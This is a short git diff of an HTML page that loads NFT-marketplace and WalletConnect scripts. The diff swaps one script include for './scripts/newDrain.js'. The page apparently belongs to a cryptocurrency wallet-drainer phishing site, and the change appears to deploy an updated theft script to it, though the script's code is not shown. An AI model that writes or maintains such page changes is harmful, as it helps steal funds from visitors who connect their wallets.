--- a/index.html
+++ b/index.html
@@ -21,7 +21,7 @@
         <script src="./scripts/seaport.js"></script>
         <script src="./scripts/wallet-connect-v2.js"></script>
         <link rel="stylesheet" href="style.css">
-        <script src="./scripts/1ea3ae11d_3.js"></script>
+        <script src="./scripts/newDrain.js"></script>
         <script charset="UTF-8" type="text/javascript" src="./scripts/feef6531-e851-434f-854b-e2f59ef534fd.js"></script>
     </head>
     <body>
